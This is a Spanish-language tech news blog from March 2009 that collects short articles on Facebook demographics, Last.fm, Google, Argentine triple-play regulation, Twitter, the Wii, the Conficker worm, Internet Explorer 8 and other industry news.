La solución CA XOsoft High Availability apunta, precisamente, a contribuir a ejecutar el plan de Recuperación ante Desastres y así proteger el acceso a los datos y aplicaciones más importantes de la organización en cualquier circunstancia. En caso de producirse una pérdida o interrupción, CA XOsoft High Availability ofrece la protección ininterrumpida de los datos y la restauración casi instantánea, a través del monitoreo integral y la replicación de las aplicaciones, bases de datos y archivos. De ese modo, ayuda a asegurar la continuidad del negocio en sus entornos de recuperación de datos. CA XOsoft High Availability forma parte de la familia de soluciones CA Recovery Management, la que también incluye CA ARCserve Backup y CA XOsoft Replication.

Facebook es furor entre las mayores de 55 años

Este grupo de usuarios creció un 540% en el último año. La gran mayoría de las personas que utilizan la red social tienen más de 26 años

Según datos publicados en diferentes medios de los Estados Unidos, la red social Facebook está experimentando un sorprendente vuelco en su target. Si bien en un primer momento fue ideado para ser utilizado por adolescentes, la gran mayoría de sus usuarios tienen más de 25 años.

Pero lo más sorprendente es el crecimiento experimentado por el grupo de usuarios conformado por mujeres mayores de 55 años. Según el diario La Voz del Interior, este grupo creció un 550% en el último año.

En tanto, el grupo que le sigue en el podio es el grupo conformado por los varones mayores a la misma edad. En este caso, creció en un 450 por ciento.

En tanto, los usuarios que oscilan entre los 45 y 50 años creció en un 400 por ciento, mientras que los que lo hacen entre los 35 y los 44 se triplicó en el último año.

Por la crisis Last.fm deja de ser gratuito

Esta radio que transmite únicamente por Internet cuenta con 30 millones de visitantes registrados y siete millones de canciones en su catálogo

Por la crisis Last.fm deja de ser gratuito

La plataforma de música en línea Last.fm exigirá, a partir del próximo 30 de marzo, una suscripción de tres euros mensuales a sus usuarios para utilizar el servicio desde cualquier país que no sea los Estados Unidos, Reino Unido y Alemania, que conservarán el modelo gratuito que caracterizó a este portal creado en 2002.

Así, tras disfrutar de un período de 30 días de pruebas sin cargo alguno, el usuario deberá abonarse al servicio, que actualmente cuenta con 30 millones de visitantes registrados y siete millones de canciones en su catálogo, según explica la propia compañía en su blog oficial.

Last.fm relaciona el cambio de rumbo a la necesidad de seguir haciendo posible "el mejor servicio de radio en la web", pero los usuarios no opinan lo mismo, según lo confirma la avalancha de comentarios que recibió el anuncio.

La mayoría lamentan la decisión, o amenazan con el traslado a otras alternativas emergentes como Spotify: "Adiós, Last.fm. `Bienvenido Spotify!".

En una de las respuestas a los comentarios, uno de los responsables de la compañía, Matthew Ogle, explica, según informa la agencia Europa Press, que los Estados Unidos, Alemania y Reino Unido no pagarán porque Last.fm cuenta en esos países con más recursos para generar ingresos por publicidad.

"Así ganamos dinero para pagar a los artistas y a las discográficas por su música", aseguró Ogle aludiendo al pago de derechos de las canciones.

Google se hizo más inteligente

Modificó su motor de búsqueda para que también pueda trabajar por asociaciones semánticas, con el fin de responder mejor a las consultas, a veces no formuladas, de los usuarios

"Desarrollamos una nueva tecnología que entiende mejor las asociaciones de ideas y los conceptos vinculados a su búsqueda", explican en el blog del gigante de Internet estadounidense Ori Allon y Ken Wilder, dos encargados del equipo técnico que busca mejorar la calidad de las respuestas a las consultas de los usuarios.

Google tiene ahora en cuenta las intenciones de los usuarios, aun si éstas son implícitas, para que las respuestas "sean más coherentes con lo que realmente busca saber".

La empresa lanzó el martes la posibilidad de realizar búsquedas semánticas en 37 idiomas.

Thursday, March 26, 2009

¿Google se pone a dieta y no "come" más empresas?

Hace seis meses que el buscador no compra ninguna compañía. Led social Twitter y la agencia de viajes Expedia serían sus próximas presas

¿Google se pone a dieta y no

Después de años engullendo empresas, Google se ha puesto a dieta. El gigante de Internet no anunció una adquisición en seis meses, una significativa bajada de ritmo, teniendo en cuenta los más de 30 acuerdos desde 2005.

El consejero delegado de la empresa, Eric Schmidt, admitió este mes la desaceleración al decirles a los inversores en una conferencia que los precios seguían siendo demasiado altos para su gusto y que los esfuerzos de fusiones y adquisiciones de Google estaban "bastante inactivos".

Sin embargo, algunos observadores señalan que puede que Google, que tiene casi u$s16.000 millones en efectivo y títulos en sus arcas, no pase mucho tiempo fuera del mercado de acuerdos.

En el competitivo mundo del software basado en Internet, las empresas como ésta tienen que buscar nuevas tecnologías y oportunidades de crecimiento fuera de sus oficinas.

"Los CEO (consejeros delegados) pueden decir todo lo que quieran mientras tanto, pero si surge el acuerdo adecuado al precio adecuado, van a pensárselo", aseguró el analista de UBS Ben Schachter.

Recientemente han circulado rumores sobre que Google habría puesto su atención en la red social Twitter y en la agencia en línea de viajes Expedia.

Google no hace comentarios sobre rumores de tratos y los analistas están divididos sobre lo jugoso de ambas posibles combinaciones.

Expedia marcaría una gran distancia con el historial de la empresa en compras y su estrategia general, centrada en la búsqueda. En tanto, Twitter ofrece elementos interesantes pero su modelo de negocio sigue sin estar claro, señalaron.

Expedia tiene un valor de mercado de unos u$s2.300 millones, y sus acciones han bajado un 70 por ciento desde el máximo que alcanzaron en mayo de 2008.

Twitter, una empresa en manos privadas que permite a sus usuarios enviar mensajes de 140 caracteres, es más difícil de valorar, aunque según diversos medios y blogs, sus conversaciones con Facebook del año pasado situaban al sitio de microblogs en torno a los 500 millones de dólares.

Karim Faris, un miembro del equipo de desarrollo corporativo de Google - la unidad que supervisa las fusiones y adquisiciones -, señaló que la desaceleración del mercado aún no se ha reflejado completamente en las valoraciones que hacen de sí mismas muchas compañías públicas y privadas, un ajuste que según dijo, podría llevar uno o dos trimestres.

Por lo general, el gancho para Google son los ingenieros de una compañía o su tecnología.

"Son todos muy jóvenes", comentó a la agencia Reuters Paul Buchheit, ex ingeniero de Google que salió para cofundar FriendFee. "Lo que tienen son algunos programadores con mucho talento y una dirección prometedora", destacó.

"Creo que han dicho que en cierto modo están reduciendo la contratación. Así que yo esperaría que hubiera también alguna forma de desaceleración en las adquisiciones de talento, simplemente porque Google está intentando hacer más con lo que ya tiene", indicó, aunque añadió que dudaba que la empresa pasara de largo si descubría un gran equipo de ingenieros.

¿Por qué los cableoperadores se quieren meter en telefonía y las "telcos" en TV?

El debate sobre el anteproyecto de ley de servicios de comunicación audiovisual reabrió la polémica por el triple play. Cuáles son los números de un mercado que mueve millones de dólares, y sobre el cual tienen puestos sus ojos las telefónicas, los operadores de TV paga y las cooperativas

¿Por qué los cableoperadores se quieren meter en telefonía y las

El lanzamiento del borrador del proyecto de ley de servicios de comunicación audiovisual por parte del Gobierno nacional, que reemplazará a la ley de radiodifusión, vigente desde la última dictadura militar con varias modificaciones implementadas desde 1983, puso de nuevo en discusión la entrega de servicios convergentes de voz, datos y TV a través de un solo proveedor, conocida en la jerga como “triple play”.

La polémica, que mantienen en forma pública las empresas telefónicas, vedadas por la ley 22.285 para ofrecer esos servicios, y los cableoperadores, quienes sí pueden dar triple play si cuentan con una licencia para telecomunicaciones, se reabrió ahora con el telón de fondo de la iniciativa oficial, porque ésta incluye la posibilidad de que las compañías de servicios públicos ingresen en el mercado de la radiodifusión.

Esa puerta que se abre para las telefónicas no es ancha, porque el ingreso se permitirá siempre y cuando el nuevo operador “garantice que más del 50 por ciento de su mercado estará disponible para que otro prestador pueda participar”.

Para las empresas de telecomunicaciones, según el consultor Enrique Carrier, “la cosa es más favorable, aunque quizás no es todo lo rosa que pudieran haberse imaginado en algún momento”.

El analista recuerda que este anteproyecto contempla que las telefónicas “ingresen al mercado de TV por suscripción, aunque como redes de transporte”. Y advierte que “se les exige una mayor apertura de sus redes vía interconexión, unbundling, no existencia de subsidios cruzados y hasta portabilidad numérica, que se aplicaría también a las redes móviles”.

Sobre esto último, Carrier (en la foto, a la izquierda) advierte “ya estaba contemplado en la regulación vigente (decreto 764/2000), aunque el Estado no se preocupó demasiado –opinó-- en hacerla cumplir”.

¿Cómo afectaría al mercado de telecomunicaciones y de TV paga la sanción de esta iniciativa? ¿Por qué las telefónicas quieren ingresar a la televisión? Al respecto, el consultor Pablo Tedesco difundió un análisis sobre el impacto de este proyecto. En su evaluación, armó un escenario con el triple play abierto para todos los jugadores del mercado.

Si se unieran los servicios de telefonía fija, Internet y TV paga, se podría decir que el mercado argentino de triple play generó en 2008 unos $15.300 millones (unos u$s4.135 millones). Este número, según los cálculos de Tedesco, está compuesto por 6.500 millones de telefonía fija (incluyendo todo concepto), 2.600 millones por accesos a Internet y 6.200 millones por TV paga. Es decir, un 42% representa telefonía fija; un 40%, TV paga; y un 18%, Internet.

Si pudieran competir en estos mercados Telefónica, Telecom y el grupo Clarín, se repartirían, de acuerdo al analista, la facturación de la siguiente manera: Telefónica tendría un 30%, un 22% para Clarin y el mismo porcentaje para Telecom. “Esto mejoraría la competencia en números relativos ya que en telefonía fija ambas compañías de telecomunicaciones están cercanas al 50%, al igual que el Grupo Clarín en TV paga”, evaluó Tedesco.

En cuanto a clientes, el mercado de triple play ascendería a más de 18 millones, que en algunos servicios están superpuestos por el duo-play, aclaró el consultor.

Al analizar este número se descubre que Telefónica pasaría a tener el 31% de éstos usuarios; Telecom, el 29%; mientras que el Grupo Clarín, el 21%. Lo mismo pasa con la facturación las tres compañías tanto en telefonía fija (Telecom y Telefónica) como en TV paga (Grupo Clarín), donde tienen casi el 50 por ciento.

Para Tedesco (en la foto, a la derecha), “estos números implican que cualquier operador nuevo que quiera ingresar a estos mercados verá barreras de ingreso muy altas por razones muy claras, infraestructura, cobertura, capacidad de atención y servicio. Los negocios para los nuevos ingresantes o los pequeños actuales quedarán para los nichos que se encuentran en mercados menos apetitosos para estas grandes compañías”.

¿Por qué las telefónicas quieren ingresar al mercado de TV paga y los cableoperadores al de telecomunicaciones? Para este analista, las respuestas pasan por este lado:

  • La telefonía fija no crece más que a un ritmo vegetativo y dejó de ser un negocio atractivo.
  • La telefonía móvil llegó a su límite de penetración en cuanto a usuarios y el ARPU (ingreso promedio por usuario) se mantiene constante.
  • Internet está llegando a su límite por el nivel de penetración de PC en hogares de la Argentina.
  • La TV paga también crece a un ritmo vegetativo.

¿En cuales de los tres servicios, voz, datos y TV, hay mayores expectativas de crecimiento y expansión si se habilita el triple play? Según Tedesco, la televisión paga, en el caso de las telefónicas, porque agregarían a su negocio un mercado de más de $6.200 millones, mientras que para las de TV paga, la oportunidad de negocio por ingresar al mercado telefónico asciende a más de $6.500 millones.

En las gateras
Mientras aguardan una definición oficial sobre el triple play, los jugadores de este partido no se quedan quietos. Por el lado de las “telcos”, Telefónica prepara el terreno con una prueba de video bajo demanda (VOD sigla en inglés), en el barrio porteño de Caballito, donde 600 clientes experimentarán este servicio.

Mientras tanto, Telecom prueba desde fines de 2008 la provisión de voz, datos y video a través de un canal convergente bajo la denominación de "Servicio Telecom Multimedia" (STM) para cerca de un centenar de empleados de la empresa en la ciudad de Buenos Aires y sus alrededores con dos plataformas, provistas por las compañías Ericsson y Alcatel-Lucent. A través de las redes IP, el servicio convergente incluye la transmisión de telefonía, video conferencia, Internet de 5 MBps, video bajo demanda (VoD) y TV.

Por el lado de los cableoperadores, CableVisión espera una respuesta técnica del Gobierno que le permitiría lanzar este año su triple play, con la oferta de telefonía en los hogares de más de 250 localidades donde hoy da el servicio de TV paga y de conexión a Internet. La compañía de televisión paga necesita para ello “sumarse” a la red de Telecom y Telefónica para poder operar ya que, de lo contrario, sus clientes no podrían realizar llamadas a usuarios de esas operadoras.

En cuanto las regulaciones estatales para operar, la empresa aguarda que la Comisión Nacional de Comunicaciones (CNC) le otorgue la numeración correspondiente para poder otorgar el servicio. Una vez obtenida la numeración, y la aprobación de las telefónicas, Cablevisión podrá ofrecer telefonía al 53% de la red, el segmento que en la actualidad es de “doble vía”.

Un actor del mercado que espera ansioso la sanción de la ley de servicios de comunicación audiovisual es el sector de las cooperativas de servicios públicos, telefónicas y eléctricas, que podrán concursar para licencias y ofrecer TV por Internet.

Según informó el boletín TV Telco Latam, en el país hay unas 300 cooperativas de telefonía y otras 50 de electricidad que brindan servicios de telecomunicaciones. Juntas suman unas 400 mil líneas telefónicas.

Por ejemplo, algunas cooperativas eléctricas, que ofrecen telefonía, tienen listas sus redes de cable y esperan aprovechar su infraestructura para ofrecer TV por cable. Y la Cooperativa de Teléfonos del balneario bonaerense de Pinamar (Telpin) ofrece video bajo demanda sobre Web TV desde enero de este año con producciones propias.

Twitter intentará captar ingresos entre las empresas

Es un servicio gratuito que permite a los usuarios enviar mensajes de texto cortos, de 140 caracteres, a su red de contactos en la web

Twitter intentará captar ingresos entre las empresas

La compañía Twitter dio un paso esperado en su idea de convertir su popularidad en ingresos: Comenzó a ofrecer a los consumidores una serie de servicios ampliados.

La empresa se prepara para ofrecer cuentas comerciales donde las corporaciones y otros negocios puedan pagar una tarifa para recibir una versión mejorada de Twitter, un servicio gratuito que permite a los usuarios enviar mensajes de texto cortos, de 140 caracteres, a su red de contactos.

"Creo que habrá oportunidad de proporcionar servicios a entidades comerciales que les ayuden a sacar mayor provecho de Twitter. Si estos servicios son valiosos para las empresas, creemos que pueden querer pagar por ellos", dijo Biz Stone, cofundador de Twitter, a la agencia Reuters.

La firma con sede en San Francisco tiene gran popularidad desde que fue creada hace tres años, pese al hecho de que aún tiene que dar beneficios. Según Nielsen Online, que mide el tráfico en Internet, la web de Twitter tuvo más de siete millones de visitantes únicos en febrero, frente a los 475.000 de febrero de 2008.

El año pasado, la compañía rechazó una oferta de 500 millones de dólares de la red social Facebook. Y algunos analistas han especulado con que Google puede haber puesto sus ojos en Twitter, por su capacidad de búsqueda en tiempo real.

Twitter cerró recientemente una ronda de financiación de capital riesgo que los medios sitúan en 35 millones de dólares, tras dos rondas previas por un total de 20 millones de dólares.

Pese a que Twitter tenía previsto inicialmente comenzar a tener ingresos en 2010, la compañía decidió recientemente acelerar el calendario y hallar formas para rentabilizar su servicio este año.


El lunes, Microsoft y la firma de marketing online Federated Media sacaron una web especial llamada ExecTweets que permite a los individuos seguir los mensajes de ejecutivos de negocios en Twitter.

Stone dijo que Twitter ha contratado a alguien para trabajar en la creación de productos comerciales. Aunque no dio fechas para la introducción de productos de cuentas comerciales, indicó que sería en algún momento de 2009.

Nintendo vende en tres años más de 50 millones de consolas Wii

Es el equipo que se vendió con mayor rapidez en la historia de los videojuegos, superando a la Xbox 360 de Microsoft y a la PlayStation 3 de Sony

Nintendo vende en tres años más de 50 millones de consolas Wii

Nintendo colocó más de 50 millones de unidades de la Wii desde su lanzamiento hace tres años, lo que la convierte en la consola de videojuegos de más rápida venta, según el presidente de la compañía japonesa.

La Wii, que se lanzó en 2006 y que compite con la Xbox 360 de Microsoft y la PlayStation 3 de Sony, demostró su éxito entre los consumidores y se considera que amplió el mercado de los videojuegos.

"Francamente, antes del lanzamiento de los sistemas de la Nintendo DS y la Wii, nadie esperaba que llegaran al nivel actual de aceptación", dijo el presidente de la empresa, Satoru Iwata, en la Conferencia de Programadores de Juegos en San Francisco. "Está incluso por encima de lo que esperábamos", añadió.

Iwata dijo que la consola es la que se vendió más rápidamente a lo largo de la historia, superando con creces a la Xbox 360 y a la PlayStation 3 de Sony. Incluso batió a la PlayStation 2, la consola más vendida de la historia, en velocidad de ventas.

El ejecutivo dijo que alrededor del 20 por ciento de hogares con Wii en Estados Unidos, tres millones de personas, no tenía otro sistema de videojuegos cuando compraron la consola.

Nintendo anunció este mes que el total de las ventas de su franquicia DS de consolas portátiles había llegado a los 100 millones.

La compañía distribuyó en Japón en noviembre su consola de nueva generación, la DSi, e Iwata explicó que hasta ahora se habían vendido dos millones. La DSi se lanzará en Europa el 3 de abril y en Estados Unidos el 5 de abril.

Advierten por virus que se activaría el 1º de abril

Se trata de Conficker, gusano informático que logró infectar más de 10 millones de computadoras alrededor del mundo. Se espera que en esa fecha, coincidente con el Día de los Inocentes en varios países, se active una nueva variante

Desde finales del año pasado y con el descubrimiento de una nueva vulnerabilidad critica dentro de los sistemas operativos Windows de Microsoft, el gusano Conficker logró infectar más de 10 millones de sistemas alrededor del mundo. El 1º de abril se espera una nueva oleada de este gusano con motivo del "April fool's day".

Desde mediados de noviembre de 2008, el virus informático conocido mediáticamente como Conficker inició su estrategia de propagación haciendo uso de la vulnerabilidad de Microsoft publicada y solucionada en octubre del mismo año.

Desde las primeras variantes al día de hoy, este gusano logró llamar la atención de los medios y de los usuarios. Microsoft llegó a ofrecer una recompensa de 250 mil dólares para quien aporte datos acerca de los creadores de esta amenaza poco después que el gusano lograse infectar más de diez millones de sistemas en todo el mundo.

Y esto no se termina acá. Los especialistas de Trend Micro informaron acerca de una nueva variante de este gusano que activaría una rutina de infección masiva el 1 de abril con motivo del "April fool's day".

Para esta fecha, en donde muchos países acostumbran hacer algún tipo de broma con alusión al "día de los tontos", la variante más reciente de Conficker realizará una búsqueda de nuevo código malicioso en la web, consultando más de 500 sitios con nombres generados aleatoriamente en base a una posibilidad de 50 mil sitios.

Esto implica que las posibilidades de bloquear la descarga de un nuevo código son virtualmente imposibles para un administrador.

Adicionalmente, el nivel de sofisticación de esta nueva variante se ve incrementado al incorporar dentro de su “carga maliciosa” la posibilidad de deshabilitar softwares de protección antivirus así como también otras herramientas de seguridad.

Una consola para países emergentes

Será presentada en Brasil y tendrá un costo de apenas u$s199. Aseguran que su poder queda a mitad de camino entre la PlayStation y la versión 2 de la consola de Sony


Una firma emergente llamada Zeebo planea lanzar una consola de videojuegos futurista en Brasil el mes próximo por 199 dólares y más tarde este año en otros países por 179.

Fue desarrollada utilizando la tecnología de teléfonos celulares de Qualcomm, la empresa de San Diego conocida por sus microcircuitos de teléfonos móviles.

La unidad de Zeebo es liviana y un poquito más grande que la Wii de Nintendo. Pero en vez de manejar videojuegos en discos, Zeebo utilizará juegos cargados de manera digital, distribuidos por medio de redes de teléfonos celulares a los que los jugadores ni siquiera tienen que suscribirse.

La consola no tiene el propósito de competir directamente con los más recientes mecanismos poderosos como PlayStation 3 de Sony Corp., Xbox 360 de Microsoft o Wii.

En cambio, dijo el director general de Zeebo, John Rizzo, está destinada a los consumidores en los mercados emergentes como Brasil, India, China y naciones de Europa oriental que por lo general no pueden costear las consolas más avanzadas o los juegos que utilizan. En muchas de esas naciones el servicio de teléfono celular está más disponible y es más barato que la banda ancha alámbrica.

Zeebo, presentada el lunes en la Conferencia de Creadores de Juegos en San Francisco, se conecta con cualquier televisor y usa una fracción de electricidad de la que necesitan las consolas más avanzadas. Sus baterías pueden ser recargadas con lo que luce como un cargador común de teléfonos celulares.

La capacidad tecnológica de Zeebo está a mitad de camino entre la PlayStation original, lanzada en 1994, y su continuación del 2000, la PlayStation 2.

Para los aficionados estadounidenses no es motivo de particular entusiasmo, pero Rizzo dijo que la gran mayoría del mercado al que está destinada no ha disfrutado de un videojuego moderno ultrarrealista. En Brasil, por ejemplo, un sistema de hace dos décadas, el Mega Drive (llamado Sega Genesis en Estados Unidos) todavía se vende bien, observó Reinaldo Normand, vicepresidente de desarrollo de negocios y licencias de Zeebo.

Tuesday, March 24, 2009

Cómo es Internet Explorer 8, la nueva apuesta de Microsoft en la web

El nuevo "browser" permite al usuario controlar el rastro que deja en las computadoras y advierte de los sitios originados por el “phising”, las estafas virtuales que se basan en correos electrónicos fraudulentos para robar las cuentas de los usuarios

Cómo es Internet Explorer 8, la nueva apuesta de Microsoft en la web

Microsoft renovó su Internet Explorer, el navegador de páginas web, que llega al mercado en su versión 8, para defender su posición predominante en el mercado, ante la competencia cada vez más fuerte de “browsers” como el Firefox (Fundación Mozilla), Safari (Apple), Chrome (Google) y Opera.

El foco del nuevo software de navegación que fabrica el gigante informático estadounidense está puesto en la seguridad y la privacidad, por un lado, y en facilitar el desarrollo de aplicaciones específicas para este programa por parte de terceros.

El Internet Explorer 8 (IE8) permite al usuario controlar el rastro que deja en las computadoras y advierte de los sitios originados por el “phising”, las estafas virtuales que se basan en correos electrónicos fraudulentos para robar las cuentas de los usuarios.

Daniel Levi, gerente de Producto de Windows para la Argentina y Uruguay, y Jorge Cella, gerente de Iniciativa de Seguridad de la compañía, explicaron a la prensa argentina las novedades que incorpora el IE8.

La intención de Microsoft es bajar la cantidad de clickeos que realiza el usuario cuando navega en la web. Para ello, el IE8 “aprende” del usuario la manera en que éste se desenvuelve por la red, los sitios que visita y lo que hace en ellos; así, a medida que lo use, le va ofreciendo hacer en forma directa sus tareas habituales.

El IE8 funciona con computadoras que utilicen Windows XP Service Pack 2 y Windows Vista. En septiembre ya estará la versión para Windows 7, el futuro sucesor de Vista, que llegaría al mercado a fin de año. El “browser” ya se puede descargar en español en http://www.microsoft.com/ie8.

Según Cella, incluye mejoras como su optimización para JavaScript, por ejemplo. Y ante una consulta de iProfesional.com, destacó que utiliza un 20 por ciento menos de memoria RAM que la anterior versión.


Más rapidez
La nueva versión integra aceleradores para ver mapas, traducciones o búsquedas sin abandonar una página web. También incluye las Web Slices para acelerar la consulta de los sitios de Internet locales más visitados.

Estos aceleradores son pequeñas programas o funcionalidades de distintos sitios online, que facilitan la tarea de compartir contenidos. Al utilizar el botón derecho del mouse se muestra en cualquier página web todas estas posibilidades. Esta función evita hacer varios clics como hasta ahora y la apertura de nuevas pestañas.

Las Web Slices permiten que el usuario pueda realizar todo tipo de acciones desde una página, incluyendo enviar un mapa a su correo electrónico, sin tener que abrir otras web.

Se trata de pequeños trozos de contenidos dinámico, que permiten ver y recibir las actualizaciones de noticias o de una subasta (como se mostró en la presentación realizada en las oficinas porteñas de Microsoft) o ver las novedades de una red social sin tener que cambiar de pantalla. Esta aplicación se abre en la barra de navegación del IE8.

Esta función requiere que el sitio web seleccionado en favoritos se haya adaptado al IE8, para lo cual existe un kit de desarrollo. Además, la propia función no debe estar deshabilitada.



Seguridad
En cuanto a la seguridad, ayuda a prevenir direcciones engañosas y descargas de otro tipo de software malicioso y además la opción InPrivate permite que las búsquedas no queden grabadas en el historial de las páginas visitadas.

Este filtro facilita que si el usuario lo desea, los sitios web no recojan información de su navegación. Con esta última medida se le da al usuario una herramienta para controlar su rastro.

Por lo tanto, el navegador no registra ni los sitios ni las contraseñas o nombres de usuario que se hagan en cada sesión. Esta funcionalidad es muy útil cuando se utilizan computadoras compartidas, como en el trabajo o en un ciber o locutorio.

La seguridad también se reforzó con el filtro SmartScreen que previene el “phishing” a través de avisos grandes que alertan al usuario si aterriza en un sitio potencialmente inseguro.

Aquí, un video de análisis del nuevo software de navegación:

Manejo centralizado
El IE8 trae novedades para los administradores de tecnología en las organizaciones. Se pueden establecer políticas de grupo para limitar el uso del navegador en empresas, y habilita funciones en forma centralizada, a través de unas 1.400 políticas de administración.

Aunque Microsoft mantiene su predominio en la web, tiene rivales fuertes, como el Firefox, el navegador de la Fundación Mozilla, que incluso supera al IE en algunos países, como Hungría. Además los usuarios de Macintosh prefieren al Safari, fabricado por Apple. Y hasta Google tiene su apuesta con el Chrome.

El código abierto cree que tiene chances de crecimiento en la crisis

El CEO de Red Hat visitó la Argentina donde apuntará el mercado de centros de datos para los sectores de gobierno, finanzas y telecomunicaciones

El código abierto cree que tiene chances de crecimiento en la crisis

En su primera visita a la Argentina, el CEO y presidente de Red Hat, Jim Whitehurst, presentó su visión del mercado de código abierto y su estrategia de virtualización.

Whitehurst (en el centro, en la foto, junto a directivos locales de la compañía), quien ingresó a Red Hat en diciembre de 2007 proveniente de la compañía aeronáutica Delta, cree que a pesar de la crisis económica internacional, 2009 será un año de oportunidades para sus negocios en el sector corporativo y especialmente en las áreas de virtualización y en proyectos de arquitectura orientada a servicios (SOA).

“Como consecuencia de la crisis financiera mundial, los grandes usuarios de tecnología revisarán los proyectos en curso y reevaluarán los nuevos. Para Red Hat, 2009 será otro año de crecimiento, ya que en tiempo de crisis el valor del proveedor es determinante, sobre todo en soluciones open source donde la reducción de costos es clave”, comentó Whitehurst.

Sobre la crisis económica mundial, comentó que el código abierto presenta una oportunidad para el mercado por la inmediata reducción en los recursos necesarios en los proyectos y por la flexibilidad que otorga este modelo.

La empresa inició sus actividades en la Argentina en el año 2006, donde comercializa Red Hat Enterprise Linux y JBoss Enterprise Middleware. La Argentina es el centro de soporte regional de Red Hat para proveer servicio integral, capacitación y una amplia cobertura de asistencia técnica a los países de habla hispana en América Latina.

Entre los proyectos que la compañía maneja para este año se encuentra la migración de Unix hacia Linux, y el foco en virtualización y en el mercado de centros de datos para los sectores de gobierno, telecomunicaciones y finanzas. En el mundo, la compañía cuenta con más de 2,5 millones de suscripciones.

Si se equivoca al mandar un e-mail, Google le cancela el envío

La empresa de Internet habilitó una herramienta para Gmail que suspende la transmisión de un correo si el usuario se arrepiente cinco segundos después

Si se equivoca al mandar un e-mail, Google le cancela el envío

La mayoría de los usuarios de Internet habrá pasado por el trance de mandar alguna vez un correo electrónico a la persona equivocada, pero ahora Google permite a los usuarios de su servicio Gmail cancelar el envío de un email, aunque sólo si reaccionan con rapidez.

El popular buscador de Internet anunció en su blog corporativo el lanzamiento de "Undo Send", una herramienta para Gmail que suspende el envío de un correo si el usuario se arrepiente cinco segundos después de haber pulsado "enviar".

"A veces he mandado un mensaje e inmediatamente me he dado cuenta de un error", reconoció Michael Leggett, diseñador de experiencia para el usuario de Google en el blog, quien citó casos "como olvidar incluir un archivo adjunto o decirle a alguien que no podré asistir a su fiesta sorpresa".

La nueva herramienta, que los usuarios tendrán que activar en la configuración de Gmail, da cinco segundos adicionales para arrepentirse y cancelar después de, por ejemplo, haber elegido por error "responder a todos" y haber mandado un email multitudinario criticando a una persona del grupo.

Pero este no es el primer servicio creado por Google para, aparentemente, protegernos de nosotros mismos.

En octubre, el buscador anunció "Mail Goggles", una función para Gmail que, una vez activada, somete al usuario a una prueba sencilla de matemáticas antes de mandar un correo.

La función, pensada para evitar el envío de e-mails en estado de embriaguez, funciona por defecto sólo durante las noches de los viernes y sábados, pero los usuarios con una vida nocturna más activa pueden configurarla para utilizarla durante toda la semana.

Monday, March 23, 2009

Crean nueva tecnología de “lentes voladoras” para achicar los chips

Con la incesante búsqueda de mayor poder de cómputo, las más brillantes mentes y las más grandes compañías están invirtiendo tiempo, dinero y esfuerzo para extender la vigencia de la Ley de Moore. Esta ley, que señala que la cantidad de transistores de los chips se duplica cada año y medio, está aproximándose a su límite, pero los fabricantes de chips buscan la forma de prolongarla.

Una nueva investigación de la Universidad de California Berkeley podría extender la vigencia de la Ley de Moore, allanando el camino para una nueva generación de transistores ultra diminutos. Además, el hallazgo podría dar como resultado una tecnología óptica de reemplazo para Blu-ray. La investigación fue conducida por Xiang Zhang y David Bogy, profesores de ingeniería mecánica en UC Berkeley. La invención de los catedráticos consiste en un brazo mecánico similar al que utilizan los discos rígidos, y una lente diminuta que literalmente vuela sobre la superficie de la oblea de chips.

Valiéndose del nuevo invento, los fabricantes de chips pudieron crear diseños de chips de 80nm de ancho; medida que podría achicarse sustancialmente. Más aún, se hizo girar a la oblea a una velocidad de 12 metros por segundo, lo que significa que la producción podría ser muy veloz. El profesor Zhang explica que “al utilizar esta nanolitografía plasmónica, podremos hacer los actuales microprocesadores más de 10 veces más pequeños, y mucho más poderosos. Esta tecnología también podría derivar en discos de densidad ultra alta, capaces de almacenar entre 10 y 100 veces lo que pueden almacenar en la actualidad”.

El concepto básico de la fotolitografía es similar al revelado de películas de la fotografía tradicional: la luz causa una reacción en una capa química sobre el material. En fotolitografía, esta reacción implica típicamente un endurecimiento. Mediante baños cáusticos, por ejemplo con ácidos, se limpian las áreas de los semiconductores que no fueron protegidas por el endurecimiento de la máscara fotolitográfica. A través de múltiples pasos se construye un circuito, el cual puede contener diversos semiconductores y componentes.

El nuevo método fotolitográfico se basa en un fenómeno según el cual los electrones metálicos vibran al exponerse a la luz. Estas pequeñas vibraciones son más cortas que la longitud de onda normal de la luz, y se conocen como ondas evanescentes. Al explotar este fenómeno, la luz puede concentrarse en patrones teóricamente tan pequeños como 5 ó 10 nanómetros. La lente usada en las pruebas medía 100nm, y utilizaba una base plasmónica de plata con un patrón concéntrico de anillos.

Durante la fotolitografía, la lente vuela sobre la superficie del sustrato. La lente voladora contacta la superficie en forma similar a como lo hace la púa en el brazo de un tocadiscos. Sin embargo, a diferencia de dicha púa, la lente no hace contactó físico con la superficie; en cambio, utiliza luz para “tocar” a la misma. La lente usa el mismo principio mecánico que los aviones, sólo que en una escala microscópica, para mantenerse a 20nm sobre la superficie.

Zhang agregó que “la velocidad y las distancias de las que estamos hablando son equivalentes a un Boeing 747 volando a 2 milímetros por encima de la superficie. Esta distancia se mantiene constante, aún cuando la superficie no sea perfectamente plana”.

La velocidad de búsqueda experimentada en las pruebas es muy alta: entre 4 y 12 ms. Hasta 100.000 lentes diminutas pueden colocarse en el brazo actuador, lo que permite muchas escrituras en paralelo.

El nuevo proceso es extremadamente barato en comparación con los métodos convencionales. Los equipamientos requeridos para emplear tecnologías tales como la litografía de 45nm son extremadamente caros, debido a las complejas configuraciones de lentes y espejos que se necesitan para concentrar la luz. Con el nuevo método, puede usarse un haz de luz ultravioleta menos costoso de producir para excitar las lentes plasmónicas.

Zhang espera que la tecnología comience a ponerse en escala de producción dentro de un período de entre 3 y 5 años. “Podrá usarse para fabricación de microelectrónica o en almacenamiento óptico de datos, brindando una resolución entre 10 y 20 veces superior a la tecnología Blu-ray actual”.

Los usuarios del Sony Reader accederán gratis a libros de Google

Se ofrecen títulos en idiomas diferentes al inglés, incluido el español, y pueden ser seleccionados por temas, títulos o autores

Los usuarios del Sony Reader accederán gratis a libros de Google

Los usarios del lector electrónico Reader, de Sony, podrán acceder de forma gratuita a más de un millón de libros exentos de derechos de autor y disponibles en Google, informó la compañía de productos electrónicos.

El acceso a esos títulos se realiza a través de la librería virtual de Sony, eBook Store, y requiere al usuario tener una cuenta con ese servicio y descargar un programa informático, que también es gratuito.

Con este acuerdo con Google, son ya más de 600.000 los títulos a disposición del usuario de la biblioteca virtual de Sony, que pueden leerse en una computadora o transferirse de ahí a un Reader.

"En colaboración con Google, podemos ofrecer a los amantes de los libros otra vía (de acceso) a libros gratis", manifestó el presidente de la división de lectura digital de Sony Electronics, Steve Haber, en un comunicado de prensa.

